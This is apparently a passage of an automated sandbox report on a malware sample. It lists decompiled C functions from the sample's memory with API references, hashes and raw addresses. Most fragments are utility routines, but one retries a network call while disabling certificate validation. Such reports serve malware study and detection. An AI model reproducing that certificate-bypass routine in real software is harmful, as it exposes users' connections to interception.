                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: c948e24534badcef074accda1de4299da692b6e357749483def35c4347e2b8cd
                                                                                                                                                                                                                                • Instruction ID: b8f053a8e66923e0cd93e60eba82fb509944f05f25194d3fb47cbce440cce521
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c948e24534badcef074accda1de4299da692b6e357749483def35c4347e2b8cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0031FC7290020AEFCB05EFD8D8849AEBBB9FF48350B20842EF5059B251D770DA41CF65
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                                                			E00A85341(char* _a4, char** _a8) {
                                                                                                                                                                                                                                				char* _t7;
                                                                                                                                                                                                                                				char* _t11;
                                                                                                                                                                                                                                				char* _t14;
                                                                                                                                                                                                                                				char* _t16;
                                                                                                                                                                                                                                				char* _t17;
                                                                                                                                                                                                                                				char _t18;
                                                                                                                                                                                                                                				signed int _t20;
                                                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t16 = _a4;
                                                                                                                                                                                                                                				_push(0x20);
                                                                                                                                                                                                                                				_t20 = 1;
                                                                                                                                                                                                                                				_push(_t16);
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t7 = StrChrA();
                                                                                                                                                                                                                                					if(_t7 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t20 = _t20 + 1;
                                                                                                                                                                                                                                					_push(0x20);
                                                                                                                                                                                                                                					_push( &(_t7[1]));
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t11 = E00A85157(_t20 << 2);
                                                                                                                                                                                                                                				_a4 = _t11;
                                                                                                                                                                                                                                				if(_t11 != 0) {
                                                                                                                                                                                                                                					StrTrimA(_t16, 0xa8c2a4); // executed
                                                                                                                                                                                                                                					_t22 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t14 = StrChrA(_t16, 0x20);
                                                                                                                                                                                                                                						if(_t14 != 0) {
                                                                                                                                                                                                                                							 *_t14 = 0;
                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                								_t14 =  &(_t14[1]);
                                                                                                                                                                                                                                								_t18 =  *_t14;
                                                                                                                                                                                                                                							} while (_t18 == 0x20 || _t18 == 9);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t17 = _a4;
                                                                                                                                                                                                                                						 *(_t17 + _t22 * 4) = _t16;
                                                                                                                                                                                                                                						_t22 = _t22 + 1;
                                                                                                                                                                                                                                						_t16 = _t14;
                                                                                                                                                                                                                                					} while (_t14 != 0);
                                                                                                                                                                                                                                					 *_a8 = _t17;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,00000000,01AE95AC,00A85884,?,00A8461A,?,01AE95AC,?,00A85884), ref: 00A8535D
                                                                                                                                                                                                                                • StrTrimA.KERNELBASE(?,00A8C2A4,00000002,?,00A8461A,?,01AE95AC,?,00A85884), ref: 00A8537B
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,?,00A8461A,?,01AE95AC,?,00A85884), ref: 00A85386
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Trim
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3043112668-0
                                                                                                                                                                                                                                • Opcode ID: 44e8f21e758417cb1d1c139b0332f00bc6eeb97cdc7b375e7d91c133eafdb936
                                                                                                                                                                                                                                • Instruction ID: 2db7e31220d986d4faf9cacd6fc036d913e047226e8f81912214ff8c49f4bf24
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44e8f21e758417cb1d1c139b0332f00bc6eeb97cdc7b375e7d91c133eafdb936
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB01BC71B007466EE714AB7A8C69F6B7B9DEF85380F141011BE55CF282DAB0CC028760
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                			E00A85B8B(intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                				long _t15;
                                                                                                                                                                                                                                				char* _t17;
                                                                                                                                                                                                                                				intOrPtr* _t19;
                                                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t19 = __imp__; // 0x7021e700
                                                                                                                                                                                                                                				_t22 =  ~_a8;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				asm("sbb esi, esi");
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                					if(_t14 != 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t15 = GetLastError();
                                                                                                                                                                                                                                					_v8 = _t15;
                                                                                                                                                                                                                                					if(_t15 != 0x2f8f) {
                                                                                                                                                                                                                                						if(_t15 == 0x2f00) {
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_v16 = 0x3300;
                                                                                                                                                                                                                                						if(_v12 == 0) {
                                                                                                                                                                                                                                							_t17 =  &_v16;
                                                                                                                                                                                                                                							__imp__(_a4, 0x1f, _t17, 4);
                                                                                                                                                                                                                                							if(_t17 == 0) {
                                                                                                                                                                                                                                								_v8 = GetLastError();
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_v12 = 1;
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L9;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A85BA8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00A8A77A,00000000,?,?), ref: 00A85BFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1452528299-1701360479
                                                                                                                                                                                                                                • Opcode ID: 18f25ec8aed937d6ca185f56c2a3f972431b3b46c96a4649a87faff525abe0c6
                                                                                                                                                                                                                                • Instruction ID: f1b5abf401c767ec980a50f55c9433aeb57fe2855c1cc55a43e2b98506f92e48
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18f25ec8aed937d6ca185f56c2a3f972431b3b46c96a4649a87faff525abe0c6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62014C75D04608FBDF10EFEADC88E9EBFB8EB94750F208066E901E2150D6708A44DF61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A853BB(void* _a4) {
                                                                                                                                                                                                                                				char _t2;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t2 = RtlFreeHeap( *0xa8d270, 0, _a4); // executed
                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: fc2f31d0a8295b82263efa51a9b9a51cdfc78d588ffc7e3ff4a3329b49d6c07f
                                                                                                                                                                                                                                • Instruction ID: ea5049af5ff137d82024665515151d688e13b65f52746fa55196000f99a92618
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc2f31d0a8295b82263efa51a9b9a51cdfc78d588ffc7e3ff4a3329b49d6c07f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BB012F1100100EBCE21CBD0DF04F05BB31B750750F004012B344040B0C2314422FF25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                			E00A86B85(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				intOrPtr* _t35;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				intOrPtr* _t41;
                                                                                                                                                                                                                                				intOrPtr* _t43;
                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                				intOrPtr* _t50;
                                                                                                                                                                                                                                				intOrPtr* _t52;
                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                				intOrPtr* _t57;
                                                                                                                                                                                                                                				intOrPtr* _t61;
                                                                                                                                                                                                                                				intOrPtr* _t65;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                				void* _t76;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t55 = _a4;
                                                                                                                                                                                                                                				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                				_a4 = 0;
                                                                                                                                                                                                                                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                				if(_t76 < 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					return _t76;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t40 = E00A84A6A(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                				_t76 = _t40;
                                                                                                                                                                                                                                				if(_t76 >= 0) {
                                                                                                                                                                                                                                					_t61 = _a28;
                                                                                                                                                                                                                                					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                						_t52 = _v8;
                                                                                                                                                                                                                                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t76 >= 0) {
                                                                                                                                                                                                                                						_t43 =  *_t55;
                                                                                                                                                                                                                                						_t68 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                						_t20 = _t68 + 0xa8e1fc; // 0x740053
                                                                                                                                                                                                                                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                						if(_t76 >= 0) {
                                                                                                                                                                                                                                							_t76 = E00A85626(_a4);
                                                                                                                                                                                                                                							if(_t76 >= 0) {
                                                                                                                                                                                                                                								_t65 = _a28;
                                                                                                                                                                                                                                								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                									_t50 = _a4;
                                                                                                                                                                                                                                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t45 = _a4;
                                                                                                                                                                                                                                						if(_t45 != 0) {
                                                                                                                                                                                                                                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t57 = __imp__#6;
                                                                                                                                                                                                                                						if(_a20 != 0) {
                                                                                                                                                                                                                                							 *_t57(_a20);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                                                                                							 *_t57(_a12);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t41 = _v8;
                                                                                                                                                                                                                                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                			}






















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A84A6A: SysAllocString.OLEAUT32(80000002), ref: 00A84AC7
                                                                                                                                                                                                                                  • Part of subcall function 00A84A6A: SysFreeString.OLEAUT32(00000000), ref: 00A84B2D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00A86C64
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00A848F5), ref: 00A86C6E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 986138563-0
                                                                                                                                                                                                                                • Opcode ID: f8f87b2c21f4dfcf0d4699dc587ea6fb55f684a14e2d7a287d3196a163dbb2bc
                                                                                                                                                                                                                                • Instruction ID: d5a6e2761a40c687542d653def297081dd9a73561b17641cd5b5095079f67a6d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f87b2c21f4dfcf0d4699dc587ea6fb55f684a14e2d7a287d3196a163dbb2bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D53149B2900119EFDB15EFA9CD88C9BBB79FFC97407144658F8459B220E632DD51CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                                                                                			E736D6F04(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                				char _t44;
                                                                                                                                                                                                                                				signed int _t48;
                                                                                                                                                                                                                                				signed int _t54;
                                                                                                                                                                                                                                				signed int _t55;
                                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                                				signed char _t67;
                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                				signed int _t86;
                                                                                                                                                                                                                                				void* _t90;
                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                				signed int _t110;
                                                                                                                                                                                                                                				signed int _t115;
                                                                                                                                                                                                                                				signed int _t119;
                                                                                                                                                                                                                                				intOrPtr* _t121;
                                                                                                                                                                                                                                				void* _t123;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t113 = __esi;
                                                                                                                                                                                                                                				_t106 = __edi;
                                                                                                                                                                                                                                				_t105 = __edx;
                                                                                                                                                                                                                                				_push(0x10);
                                                                                                                                                                                                                                				E736D7870(__ebx, __edi, __esi);
                                                                                                                                                                                                                                				_t43 = E736D754E(__ecx, __edx, 0); // executed
                                                                                                                                                                                                                                				_t90 = 0x736e99e8;
                                                                                                                                                                                                                                				if(_t43 == 0) {
                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                					_t44 = 0;
                                                                                                                                                                                                                                					__eflags = 0;
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					 *((char*)(_t123 - 0x1d)) = E736D7453();
                                                                                                                                                                                                                                					_t85 = 1;
                                                                                                                                                                                                                                					 *((char*)(_t123 - 0x19)) = 1;
                                                                                                                                                                                                                                					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                                                                                                                                                                                                                                					_t132 =  *0x736ef460;
                                                                                                                                                                                                                                					if( *0x736ef460 != 0) {
                                                                                                                                                                                                                                						E736D76ED(_t105, __edi, __esi, 7);
                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                						_push(0x10);
                                                                                                                                                                                                                                						_push(0x736e9a08);
                                                                                                                                                                                                                                						E736D7870(1, __edi, __esi);
                                                                                                                                                                                                                                						_t48 =  *0x736ef120; // 0x1
                                                                                                                                                                                                                                						__eflags = _t48;
                                                                                                                                                                                                                                						if(_t48 > 0) {
                                                                                                                                                                                                                                							 *0x736ef120 = _t48 - 1;
                                                                                                                                                                                                                                							 *(_t123 - 0x1c) = 1;
                                                                                                                                                                                                                                							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                                                                                                                                                                                                                                							 *((char*)(_t123 - 0x20)) = E736D7453();
                                                                                                                                                                                                                                							 *(_t123 - 4) = 1;
                                                                                                                                                                                                                                							__eflags =  *0x736ef460 - 2;
                                                                                                                                                                                                                                							if( *0x736ef460 != 2) {
                                                                                                                                                                                                                                								E736D76ED(_t105, 1, _t113, 7);
                                                                                                                                                                                                                                								asm("int3");
                                                                                                                                                                                                                                								_push(0xc);
                                                                                                                                                                                                                                								_push(0x736e9a30);
                                                                                                                                                                                                                                								E736D7870(1, 1, _t113);
                                                                                                                                                                                                                                								_t110 =  *(_t123 + 0xc);
                                                                                                                                                                                                                                								__eflags = _t110;
                                                                                                                                                                                                                                								if(_t110 != 0) {
                                                                                                                                                                                                                                									L23:
                                                                                                                                                                                                                                									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                                                                                                                                                                                                                                									__eflags = _t110 - 1;
                                                                                                                                                                                                                                									if(_t110 == 1) {
                                                                                                                                                                                                                                										L26:
                                                                                                                                                                                                                                										_t86 =  *(_t123 + 0x10);
                                                                                                                                                                                                                                										_t115 = E736D71C6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
                                                                                                                                                                                                                                										 *(_t123 - 0x1c) = _t115;
                                                                                                                                                                                                                                										__eflags = _t115;
                                                                                                                                                                                                                                										if(_t115 != 0) {
                                                                                                                                                                                                                                											_t55 = E736D6EB1(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
                                                                                                                                                                                                                                											_t115 = _t55;
                                                                                                                                                                                                                                											 *(_t123 - 0x1c) = _t115;
                                                                                                                                                                                                                                											__eflags = _t115;
                                                                                                                                                                                                                                											if(_t115 != 0) {
                                                                                                                                                                                                                                												goto L28;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										__eflags = _t110 - 2;
                                                                                                                                                                                                                                										if(_t110 == 2) {
                                                                                                                                                                                                                                											goto L26;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t86 =  *(_t123 + 0x10);
                                                                                                                                                                                                                                											L28:
                                                                                                                                                                                                                                											_push(_t86);
                                                                                                                                                                                                                                											_t115 = E736D6490( *((intOrPtr*)(_t123 + 8)), _t110);
                                                                                                                                                                                                                                											 *(_t123 - 0x1c) = _t115;
                                                                                                                                                                                                                                											__eflags = _t110 - 1;
                                                                                                                                                                                                                                											if(_t110 == 1) {
                                                                                                                                                                                                                                												__eflags = _t115;
                                                                                                                                                                                                                                												if(_t115 == 0) {
                                                                                                                                                                                                                                													_push(_t86);
                                                                                                                                                                                                                                													_t59 = E736D6490( *((intOrPtr*)(_t123 + 8)), _t56);
                                                                                                                                                                                                                                													__eflags = _t86;
                                                                                                                                                                                                                                													_t34 = _t86 != 0;
                                                                                                                                                                                                                                													__eflags = _t34;
                                                                                                                                                                                                                                													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
                                                                                                                                                                                                                                													L14();
                                                                                                                                                                                                                                													_pop(_t90);
                                                                                                                                                                                                                                													E736D71C6( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                											__eflags = _t110;
                                                                                                                                                                                                                                											if(_t110 == 0) {
                                                                                                                                                                                                                                												L33:
                                                                                                                                                                                                                                												_t115 = E736D6EB1(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
                                                                                                                                                                                                                                												 *(_t123 - 0x1c) = _t115;
                                                                                                                                                                                                                                												__eflags = _t115;
                                                                                                                                                                                                                                												if(_t115 != 0) {
                                                                                                                                                                                                                                													_t115 = E736D71C6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
                                                                                                                                                                                                                                													 *(_t123 - 0x1c) = _t115;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												__eflags = _t110 - 3;
                                                                                                                                                                                                                                												if(_t110 == 3) {
                                                                                                                                                                                                                                													goto L33;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									 *(_t123 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                									_t54 = _t115;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									__eflags =  *0x736ef120 - _t110; // 0x1
                                                                                                                                                                                                                                									if(__eflags > 0) {
                                                                                                                                                                                                                                										goto L23;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t54 = 0;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
                                                                                                                                                                                                                                								return _t54;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								E736D751E(1, _t90, 1, _t113);
                                                                                                                                                                                                                                								E736D73DA();
                                                                                                                                                                                                                                								E736D783C();
                                                                                                                                                                                                                                								 *0x736ef460 =  *0x736ef460 & 0x00000000;
                                                                                                                                                                                                                                								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                                                                                                                                                                                                                                								E736D70A0();
                                                                                                                                                                                                                                								_t67 = E736D76BF( *((intOrPtr*)(_t123 + 8)), 0);
                                                                                                                                                                                                                                								asm("sbb esi, esi");
                                                                                                                                                                                                                                								_t119 =  ~(_t67 & 0x000000ff) & 1;
                                                                                                                                                                                                                                								__eflags = _t119;
                                                                                                                                                                                                                                								 *(_t123 - 0x1c) = _t119;
                                                                                                                                                                                                                                								 *(_t123 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                								E736D70AD();
                                                                                                                                                                                                                                								_t69 = _t119;
                                                                                                                                                                                                                                								goto L18;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t69 = 0;
                                                                                                                                                                                                                                							L18:
                                                                                                                                                                                                                                							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
                                                                                                                                                                                                                                							return _t69;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						 *0x736ef460 = 1;
                                                                                                                                                                                                                                						if(E736D74B0(_t132) != 0) {
                                                                                                                                                                                                                                							E736D73CE(E736D7810());
                                                                                                                                                                                                                                							E736D73F2();
                                                                                                                                                                                                                                							_t80 = E736D8A97(0x736e1114, 0x736e1124);
                                                                                                                                                                                                                                							_pop(_t102);
                                                                                                                                                                                                                                							if(_t80 == 0 && E736D7485(1, _t102) != 0) {
                                                                                                                                                                                                                                								E736D8A50(_t102, 0x736e1108, 0x736e1110);
                                                                                                                                                                                                                                								 *0x736ef460 = 2;
                                                                                                                                                                                                                                								_t85 = 0;
                                                                                                                                                                                                                                								 *((char*)(_t123 - 0x19)) = 0;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *(_t123 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                						E736D6FE7();
                                                                                                                                                                                                                                						if(_t85 != 0) {
                                                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t121 = E736D76E7();
                                                                                                                                                                                                                                							_t138 =  *_t121;
                                                                                                                                                                                                                                							if( *_t121 != 0) {
                                                                                                                                                                                                                                								_push(_t121);
                                                                                                                                                                                                                                								if(E736D760E(_t85, _t106, _t121, _t138) != 0) {
                                                                                                                                                                                                                                									 *0x736e1104( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
                                                                                                                                                                                                                                									 *((intOrPtr*)( *_t121))();
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							 *0x736ef120 =  *0x736ef120 + 1;
                                                                                                                                                                                                                                							_t44 = 1;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
                                                                                                                                                                                                                                						return _t44;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                0x736d70c2
                                                                                                                                                                                                                                0x736d70c7
                                                                                                                                                                                                                                0x736d70ca
                                                                                                                                                                                                                                0x736d70cc
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70e1
                                                                                                                                                                                                                                0x736d70e4
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70fd
                                                                                                                                                                                                                                0x736d70ff
                                                                                                                                                                                                                                0x736d7102
                                                                                                                                                                                                                                0x736d7104
                                                                                                                                                                                                                                0x736d710f
                                                                                                                                                                                                                                0x736d7114
                                                                                                                                                                                                                                0x736d7116
                                                                                                                                                                                                                                0x736d7119
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d712b
                                                                                                                                                                                                                                0x736d712d
                                                                                                                                                                                                                                0x736d7130
                                                                                                                                                                                                                                0x736d7133
                                                                                                                                                                                                                                0x736d7135
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d7139
